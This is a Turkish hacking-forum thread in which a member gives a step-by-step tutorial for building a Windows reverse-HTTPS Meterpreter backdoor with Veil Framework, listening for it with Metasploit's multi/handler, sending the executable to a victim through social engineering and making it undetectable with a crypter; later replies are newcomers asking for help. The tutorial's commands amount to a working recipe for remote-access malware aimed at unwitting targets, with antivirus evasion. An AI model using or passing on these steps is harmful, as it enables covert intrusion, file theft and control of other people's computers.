THT DUYURU

chat
Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

ugursuz reklam
takipci
Seçenekler

Veil Framework [Detaylı Anlatım] / Kill4Dead

Kill4Dead - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
1.535
Konular:
204
Teşekkür (Etti):
178
Teşekkür (Aldı):
280
Ticaret:
(0) %
10
9464
22-03-2019 16:28
#1
Herkese merhaba. Bu yazımda "Veil Framework nedir, nasıl kullanılır, işlevleri nelerdir?" bunlardan bahsedeceğim.



Veil Framework



3.1.X



Veil Framework işlevsel bir BackDoor aracıdır. Kısaca değinmek gerekir ise, saldırı altındaki bilgisayar saldırganın bilgisayarı ile iletişime geçer ve saldırı altındaki bilgisayar saldırganın bilgisayarına bağlanır. Adından da anlaşıldığı gibi arka kapıyı açık bırakır. Yani siz istediğiniz zaman saldırı altındaki bilgisayar ile sorunsuz bir şekilde bağlantı kurabilirsiniz.


  1. Pek fazla bir özelliği yoktur aslında. Sade ve öz bir konsol (Terminal) uygulamasıdır.
  2. İstediğiniz zaman; kurbanın bilgisayarına bağlanabilir,
  3. Bütün dosyalarında dolaşabilir,
  4. Dosyalarını bilgisayarınıza indirebilir,
  5. İstediğiniz dosyayı bilgisayarına yükleyebilirsiniz.



GITHUB LINKINE GIT

Kod:
sudo su
cd /(indirmek istediğiniz dizin)
git clone https://github.com/Veil-Framework/Veil


Git Clone ile Veil Framework' u indirdikten sonra aşağıdaki kodları sırası ile uygulayalım.

Kod:
# cd /kayitliolduguklasör/Veil
# ./config/setup.sh --force --silent
# Python Veil.py
# use 1 (Evasion)
# list (Buradan istediğimiz backdoor' u seçiyoruz.)
# use 27 (Biz python/meterpreter/rev_https.py' i seçtik.)
(Şimdi ise gerekli ayarlamaları yapacağız. Hepsinden bahsedemem çok geniş ve her backdoor' da farklı özellikler mevcut. Bunları kurcalayarak bulabilirsiniz.)
# set LHOST 192.168.2.1 (Sizin IP adresiniz ne ise onu girin.)
# set LPORT 8000 (Karşı bilgisayarın bizimle hangi port üzerinden iletişim kuracağını seçiyoruz.)
# set SLEEP 60 (Backdoor' umuz kurban exe dosyasına tıkladıktan 60 saniye sonra aktif olacak.)
# generate (Bütün ayarlamaları yaptıktan sonra generate diyerek Payload' umuzu oluşturuyoruz.)
# payload1 (Payload' ımızın adını istediğimiz gibi giriyoruz.)
# 1 (PyInstaller ile Payload' ın kurulumunu gerçekleştiriyoruz.)
4. resimde gözüktüğü üzere bize kayıtlı olduğu yeri söylüyor. (Executable written to: /var/lib/veil/output/compiled/payload1.exe )
Daha sonra ise ilgili klasörden (/var/lib/veil/output/compiled) payload1.exe isimli arka kapı virüsümüzü sosyal mühendislik yöntemi ile karşı tarafa atacağız.
































Şimdi ise bağlantımızı dinleyebilmemiz için met*asploit isimli programa ihtiyacımız var. Bir çoğumuz bu programı kullanmasakta, kullanımını bilmesekte duymuşuzdur.
Aşağıdaki gibi programı aynı çekilde bilgisayarımıza kuruyoruz.



Kod:
sudo su
cd /(indirmek istediğiniz dizin)
git clone https://github.com/rapid7/****sploit-framework.git
Şimdi ise aşağıdaki komutu yazarak programımızı terminalden çalıştırıyoruz.
Kod:
msfconsole


Evet gördüğünüz gibi programın arayüzü açıldı.





Aşağıdaki kodları çalıştırarak oluşturmuş olduğumuz Payload' ı dinlemeye alıyoruz. (Multi Handler Kullanımı ile)

Kod:
# use /exploit/multi/handler
# show options
# set PAYLOAD windows/meterpreter/reverse_https
# set LHOST (Veil' da girmiş olduğumuz IP)
# set LPORT (Veil' da girmiş olduğumuz PORT)
# exploit (BackDoor' umuzu dinlemeye alıyoruz.)
Artık terminal komutları ile dilediğimiz herşeyi yapabiliriz.



Bir Crypter ile oluşturduğunuz Payload' ı FUD hale getirin ve Veil.py' de ayarları yaparken anti-virüslere takılmamak için bütün ayarları değiştirin.







Konu Kill4Dead tarafından (22-03-2019 23:42 Saat 23:42 ) değiştirilmiştir.
sah mat - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
03/2019
Mesajlar:
105
Konular:
17
Teşekkür (Etti):
64
Teşekkür (Aldı):
27
Ticaret:
(0) %
22-03-2019 17:10
#2
Gerçekten forumda öğrenilmesi gereken bi konu Backdoor hakkında bilmediklerimi konunuz sayesinde öğrendim
SAYGILARIMLA ŞahMat
C R P - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
05/2018
Mesajlar:
507
Konular:
210
Teşekkür (Etti):
17
Teşekkür (Aldı):
3
Ticaret:
(0) %
24-03-2019 00:37
#3
Bu işlerde yeniyim de , linux terminal ile ilgili yardımcı olabilirmisin hocam
Kill4Dead - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
1.535
Konular:
204
Teşekkür (Etti):
178
Teşekkür (Aldı):
280
Ticaret:
(0) %
24-03-2019 00:45
#4
Alıntı:
C R P´isimli üyeden Alıntı Mesajı göster
Bu işlerde yeniyim de , linux terminal ile ilgili yardımcı olabilirmisin hocam
Tabi ki. Herhangi bir Linux dağıtımını kullanıyor musunuz? Sanal bilgisayarda veya ana makinede?
C R P - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
05/2018
Mesajlar:
507
Konular:
210
Teşekkür (Etti):
17
Teşekkür (Aldı):
3
Ticaret:
(0) %
24-03-2019 00:50
#5
Alıntı:
Kill4Dead´isimli üyeden Alıntı Mesajı göster
Tabi ki. Herhangi bir Linux dağıtımını kullanıyor musunuz? Sanal bilgisayarda veya ana makinede?
Hayır , dediğim gibi hiçbir bilgim yok. youtubeden bakarak vs denedim ama ordakiler de sıfırdan göstermedikleri için yapamadım.
Kill4Dead - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
1.535
Konular:
204
Teşekkür (Etti):
178
Teşekkür (Aldı):
280
Ticaret:
(0) %
24-03-2019 00:53
#6
Alıntı:
C R P´isimli üyeden Alıntı Mesajı göster
Hayır , dediğim gibi hiçbir bilgim yok. youtubeden bakarak vs denedim ama ordakiler de sıfırdan göstermedikleri için yapamadım.
Ben size elimden geldiğince yardımcı olurum ancak sanal bilgisayar kurmanız gerekmekte öncelikle. VirtualBox' u indirip daha sonra Kali Linux veya Parrot OS bu iki işletim sisteminden birini indirmeniz tavsiyemdir. Pentesting üzerine tasarlanmış sistemlerdir. Daha sonrası oldukça basit RAT oluşturmanız 5 dakikanızı alacaktır.
alicanbeyx - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
09/2017
Mesajlar:
16
Konular:
2
Teşekkür (Etti):
3
Teşekkür (Aldı):
0
Ticaret:
(0) %
28-03-2019 21:00
#7
merhaba bu konularda yeniyim yardımcı olmanız münkün mü acaba minnettar kalırım
Kill4Dead - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Mesajlar:
1.535
Konular:
204
Teşekkür (Etti):
178
Teşekkür (Aldı):
280
Ticaret:
(0) %
28-03-2019 22:29
#8
Alıntı:
alicanbeyx´isimli üyeden Alıntı Mesajı göster
merhaba bu konularda yeniyim yardımcı olmanız münkün mü acaba minnettar kalırım
Herşeyi tam olarak anlatamam ancak yol gösterebilirim. Buyrun.
RONAKS1453 - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
04/2020
Mesajlar:
3
Konular:
0
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Ticaret:
(0) %
21-04-2020 14:00
#9
Merhaba konu gerçekten yararlıydı eline sağlık fakat bir sorum olucak:
LHOST'a local ip yazmak zorunda mıyız yani dış ağdaki birisine göndericeksek public ip'mizi yazabilir miyiz ve eğer yazarsak ip'mizi bulabilir mi ?
szbegbekirenes - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
04/2020
Mesajlar:
2
Konular:
0
Teşekkür (Etti):
1
Teşekkür (Aldı):
0
Ticaret:
(0) %
21-04-2020 14:09
#10
Alıntı:
Kill4Dead´isimli üyeden Alıntı Mesajı göster
Ben size elimden geldiğince yardımcı olurum ancak sanal bilgisayar kurmanız gerekmekte öncelikle. VirtualBox' u indirip daha sonra Kali Linux veya Parrot OS bu iki işletim sisteminden birini indirmeniz tavsiyemdir. Pentesting üzerine tasarlanmış sistemlerdir. Daha sonrası oldukça basit RAT oluşturmanız 5 dakikanızı alacaktır.
efendim ben virtualbox u indirdim fakat bilgisayarımda sanal makina özelliği olmadığı için kali linux u kuramadım. Var mı bir yolu yoksa kuramazmıyım?

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler